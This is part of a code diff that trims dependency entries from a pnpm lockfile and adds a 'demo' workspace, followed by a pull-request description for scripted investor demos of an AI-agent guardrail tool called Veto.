   restore-cursor@5.1.0:
     dependencies:
@@ -6248,12 +4715,6 @@ snapshots:
 
   safer-buffer@2.1.2: {}
 
-  scheduler@0.23.2:
-    dependencies:
-      loose-envify: 1.4.0
-
-  semver@6.3.1: {}
-
   semver@7.7.3: {}
 
   shebang-command@2.0.0:
@@ -6265,8 +4726,6 @@ snapshots:
   siginfo@2.0.0: {}
 
   signal-exit@4.1.0: {}
-
-  sisteransi@1.0.5: {}
 
   slash@3.0.0: {}
 
@@ -6325,59 +4784,11 @@ snapshots:
 
   strip-json-comments@3.1.1: {}
 
-  sucrase@3.35.1:
-    dependencies:
-      "@jridgewell/gen-mapping": 0.3.13
-      commander: 4.1.1
-      lines-and-columns: 1.2.4
-      mz: 2.7.0
-      pirates: 4.0.7
-      tinyglobby: 0.2.15
-      ts-interface-checker: 0.1.13
-
   supports-color@7.2.0:
     dependencies:
       has-flag: 4.0.0
 
-  supports-preserve-symlinks-flag@1.0.0: {}
-
-  tailwindcss@3.4.19(tsx@4.21.0)(yaml@2.8.2):
-    dependencies:
-      "@alloc/quick-lru": 5.2.0
-      arg: 5.0.2
-      chokidar: 3.6.0
-      didyoumean: 1.2.2
-      dlv: 1.1.3
-      fast-glob: 3.3.3
-      glob-parent: 6.0.2
-      is-glob: 4.0.3
-      jiti: 1.21.7
-      lilconfig: 3.1.3
-      micromatch: 4.0.8
-      normalize-path: 3.0.0
-      object-hash: 3.0.0
-      picocolors: 1.1.1
-      postcss: 8.5.6
-      postcss-import: 15.1.0(postcss@8.5.6)
-      postcss-js: 4.1.0(postcss@8.5.6)
-      postcss-load-config: 6.0.1(jiti@1.21.7)(postcss@8.5.6)(tsx@4.21.0)(yaml@2.8.2)
-      postcss-nested: 6.2.0(postcss@8.5.6)
-      postcss-selector-parser: 6.1.2
-      resolve: 1.22.11
-      sucrase: 3.35.1
-    transitivePeerDependencies:
-      - tsx
-      - yaml
-
   term-size@2.2.1: {}
-
-  thenify-all@1.6.0:
-    dependencies:
-      thenify: 3.3.1
-
-  thenify@3.3.1:
-    dependencies:
-      any-promise: 1.3.0
 
   tinybench@2.9.0: {}
 
@@ -6396,13 +4807,9 @@ snapshots:
 
   tr46@0.0.3: {}
 
-  tree-sitter-wasms@0.1.13: {}
-
   ts-api-utils@2.4.0(typescript@5.9.3):
     dependencies:
       typescript: 5.9.3
-
-  ts-interface-checker@0.1.13: {}
 
   tsx@4.21.0:
     dependencies:
@@ -6461,26 +4868,9 @@ snapshots:
 
   universalify@0.1.2: {}
 
-  update-browserslist-db@1.2.3(browserslist@4.28.1):
-    dependencies:
-      browserslist: 4.28.1
-      escalade: 3.2.0
-      picocolors: 1.1.1
-
   uri-js@4.4.1:
     dependencies:
       punycode: 2.3.1
-
-  util-deprecate@1.0.2: {}
-
-  vite@5.4.21(@types/node@22.19.3):
-    dependencies:
-      esbuild: 0.21.5
-      postcss: 8.5.6
-      rollup: 4.55.1
-    optionalDependencies:
-      "@types/node": 22.19.3
-      fsevents: 2.3.3
 
   vite@7.3.0(@types/node@20.19.27)(jiti@1.21.7)(tsx@4.21.0)(yaml@2.8.2):
     dependencies:
@@ -6492,21 +4882,6 @@ snapshots:
       tinyglobby: 0.2.15
     optionalDependencies:
       "@types/node": 20.19.27
-      fsevents: 2.3.3
-      jiti: 1.21.7
-      tsx: 4.21.0
-      yaml: 2.8.2
-
-  vite@7.3.0(@types/node@22.19.3)(jiti@1.21.7)(tsx@4.21.0)(yaml@2.8.2):
-    dependencies:
-      esbuild: 0.27.2
-      fdir: 6.5.0(picomatch@4.0.3)
-      picomatch: 4.0.3
-      postcss: 8.5.6
-      rollup: 4.55.1
-      tinyglobby: 0.2.15
-    optionalDependencies:
-      "@types/node": 22.19.3
       fsevents: 2.3.3
       jiti: 1.21.7
       tsx: 4.21.0
@@ -6549,48 +4924,9 @@ snapshots:
       - tsx
       - yaml
 
-  vitest@4.0.16(@types/node@22.19.3)(jiti@1.21.7)(tsx@4.21.0)(yaml@2.8.2):
-    dependencies:
-      "@vitest/expect": 4.0.16
-      "@vitest/mocker": 4.0.16(vite@7.3.0(@types/node@22.19.3)(jiti@1.21.7)(tsx@4.21.0)(yaml@2.8.2))
-      "@vitest/pretty-format": 4.0.16
-      "@vitest/runner": 4.0.16
-      "@vitest/snapshot": 4.0.16
-      "@vitest/spy": 4.0.16
-      "@vitest/utils": 4.0.16
-      es-module-lexer: 1.7.0
-      expect-type: 1.3.0
-      magic-string: 0.30.21
-      obug: 2.1.1
-      pathe: 2.0.3
-      picomatch: 4.0.3
-      std-env: 3.10.0
-      tinybench: 2.9.0
-      tinyexec: 1.0.2
-      tinyglobby: 0.2.15
-      tinyrainbow: 3.0.3
-      vite: 7.3.0(@types/node@22.19.3)(jiti@1.21.7)(tsx@4.21.0)(yaml@2.8.2)
-      why-is-node-running: 2.3.0
-    optionalDependencies:
-      "@types/node": 22.19.3
-    transitivePeerDependencies:
-      - jiti
-      - less
-      - lightningcss
-      - msw
-      - sass
-      - sass-embedded
-      - stylus
-      - sugarss
-      - terser
-      - tsx
-      - yaml
-
   web-streams-polyfill@3.3.3: {}
 
   web-streams-polyfill@4.0.0-beta.3: {}
-
-  web-tree-sitter@0.26.3: {}
 
   webidl-conversions@3.0.1: {}
 
@@ -6629,8 +4965,6 @@ snapshots:
       strip-ansi: 7.1.2
 
   ws@8.19.0: {}
-
-  yallist@3.1.1: {}
 
   yaml@2.8.2: {}
 

--- a/pnpm-workspace.yaml
+++ b/pnpm-workspace.yaml
@@ -1,3 +1,4 @@
 packages:
-  - 'packages/*'
-  - 'apps/*'
+  - "packages/*"
+  - "apps/*"
+  - "demo"


### PR DESCRIPTION
## Summary

Self-contained investor demo with three scripted scenarios showing Veto enforcement in action. All outputs are deterministic with no external dependencies.

## Changes

- Add `demo/` directory with three demo scenarios
- Scenario 01: Email Guard -- blocks external recipients and sensitive content
- Scenario 02: Browser Guard -- blocks phishing sites, XSS injection, shell escape
- Scenario 03: Multi-Agent Coordination -- per-agent permission scoping, payment limits, path protection
- Add shared mock agent, mock tools, and colored terminal reporter
- Add video recording runbook with talking points
- Add `demo` to pnpm workspace

## Type

- [x] New feature

## Checklist

- [ ] Added changeset (`pnpm changeset`) if this affects published packages
- [x] Tests pass (`pnpm test`)
- [x] Build succeeds (`pnpm build`)

## Related Issues

Closes #6

@Greptile review